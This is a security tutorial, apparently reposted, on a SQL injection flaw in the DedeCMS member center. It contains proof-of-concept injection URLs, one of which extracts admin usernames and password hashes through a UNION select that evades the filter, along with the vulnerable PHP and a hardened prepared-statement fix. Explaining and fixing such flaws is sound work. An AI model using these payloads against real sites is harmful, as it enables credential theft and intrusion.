dedecms /member/myfriend_group.php SQL Injection Vul

2019-07-03 Author: 计算机教程   |   Views (174)

Catalog

1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Code analysis
5. Mitigation
6. Offense and defense considerations

1. Vulnerability description

DedeCMS member-center (会员中心) SQL injection vulnerability

**Relevant Link**


http://exp.03sec.com/dedecms-会员中心注入漏洞10.shtml
http://www.05112.com/anquan/ldfb/sql/2014/0209/7723.html

2. Trigger conditions

0x1: POC1

1. First open: http://127.0.0.1/dedecms5.7/member/myfriend_group.php
2. Add an arbitrary group, e.g. `group`. Look at the value inside groupname[] in the page source: the injection goes through the array key, and it is blind, because nothing is returned; whether the condition held is judged by whether the original row was updated.
3. http://127.0.0.1/dedecms5.7/member/myfriend_group.php?dopost=save&groupname[2' or @`'` and (select 1)=1 and '1]=12222
   If (select 1)=1 is true, that groupname is changed to 12222; replace the 2 above with the ID of your own group.

0x2: POC2

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2 UniOn SelEct 1,2,3,4,5,6,7,8,9,10,11,12 #

If this errors out with: Safe Alert: Request Error step 1 !

0x3: POC3

Error-based injection

http://127.0.0.1/dedecms5.5/member/pm.php?dopost=read&id=1' and char(@`'`) and 1=2 /*!50000Union*/ /*!50000select*/ 1,2,3,4,5,6,userid,8,9,10,11,pwd from `dede_admin`#

**Relevant Link**

http://www.wooyun.org/bugs/wooyun-2014-048923

3. Affected scope

4. Code analysis

/member/myfriend_group.php

```php
elseif ($dopost == 'save')
{
    if(isset($mtypeidarr) && is_array($mtypeidarr))
    {
        // Group ids selected for deletion are numeric-filtered before use.
        $delids = '0';
        $mtypeidarr = array_filter($mtypeidarr, 'is_numeric');
        foreach($mtypeidarr as $delid)
        {
            $delids .= ','.$delid;
            unset($groupname[$delid]);
        }
        $query = "DELETE FROM `dede_member_group` WHERE id in ($delids) AND mid='$cfg_ml->M_ID'";
        $dsql->ExecNoneQuery($query);
        // Friends in the deleted groups are moved back to the default group (id 1).
        $sql = "SELECT id FROM `dede_member_friends` WHERE groupid in ($delids) AND mid='$cfg_ml->M_ID'";
        $dsql->SetQuery($sql);
        $dsql->Execute();
        while($row = $dsql->GetArray())
        {
            $query2 = "UPDATE `dede_member_friends` SET groupid='1' WHERE id='{$row['id']}' AND mid='$cfg_ml->M_ID'";
            $dsql->ExecNoneQuery($query2);
        }
    }
    // Array-key ($id) injection: the keys of groupname[] come straight from the request.
    // Only the value passes through HtmlReplace(); $id is concatenated into the UPDATE unescaped.
    foreach ($groupname as $id => $name)
    {
        $name = HtmlReplace($name);
        $query = "UPDATE `dede_member_group` SET groupname='$name' WHERE id='$id' AND mid='$cfg_ml->M_ID'";
        echo $query; // debug output added by the author to show the assembled query
        $dsql->ExecuteNoneQuery($query);
    }
    ShowMsg('分组修改完成(删除分组中的会员会转移到默认分组中)','myfriend_group.php');
}
```

The deletion branch filters `$mtypeidarr` with `is_numeric`, but the rename loop applies no such check to the array key `$id` of `groupname[]`, which is the injection point the POC in section 2 drives.

5. Mitigation
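A hardened form of the rename loop from the code analysis above, added here as an example (it is not DedeCMS's own code): it assumes a PDO connection, uses an in-memory SQLite table with the same columns so it runs stand-alone, and stands `$memberId` in for `$cfg_ml->M_ID`.

```php
<?php
// Added example, not DedeCMS's own code: a hardened replacement for the
// `foreach ($groupname as $id => $name)` loop in myfriend_group.php.
// Assumptions: a PDO connection (an in-memory SQLite table with the same
// columns is used here so the file runs on its own), and $memberId standing
// in for $cfg_ml->M_ID.

function saveGroupNames(PDO $pdo, array $groupname, int $memberId): array
{
    // Every request value is bound as a parameter; none reaches the SQL text.
    $stmt = $pdo->prepare(
        'UPDATE `dede_member_group` SET groupname = :name WHERE id = :id AND mid = :mid'
    );
    $result = ['updated' => 0, 'rejected' => []];
    foreach ($groupname as $id => $name) {
        // The array KEY is attacker-controlled as well as the value. Accept only
        // a plain positive integer, so a key like the POC's `2' or ...` is dropped.
        if (!preg_match('/^[1-9][0-9]*$/', (string)$id)) {
            $result['rejected'][] = (string)$id;
            continue;
        }
        $name = htmlspecialchars((string)$name, ENT_QUOTES, 'UTF-8');
        $stmt->execute([':name' => $name, ':id' => (int)$id, ':mid' => $memberId]);
        // The mid predicate stays, so a member can only rename their own groups.
        $result['updated'] += $stmt->rowCount();
    }
    return $result;
}

// Constructed data for a self-contained run.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE `dede_member_group` (id INTEGER PRIMARY KEY, mid INTEGER, groupname TEXT)');
$pdo->exec("INSERT INTO `dede_member_group` VALUES (2, 7, 'group'), (3, 7, 'work'), (4, 8, 'other')");

// Constructed request: the POC key from section 2, a legitimate rename of the
// member's own group 3, and an attempt to rename group 4, which belongs to mid 8.
$request = [
    "2' or @`'` and (select 1)=1 and '1" => '12222',
    '3' => 'colleagues',
    '4' => 'hijack',
];
print_r(saveGroupNames($pdo, $request, 7));
print_r($pdo->query('SELECT id, mid, groupname FROM `dede_member_group` ORDER BY id')->fetchAll(PDO::FETCH_ASSOC));
```

Rejecting rather than silently casting the key also gives a clean signal to log: the legitimate form never produces a non-numeric groupname[] key.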

Published by www.2003.com under Computer Tutorials; when reposting, please credit the source: dedecms /member/myfriend_group.php SQL Injection Vul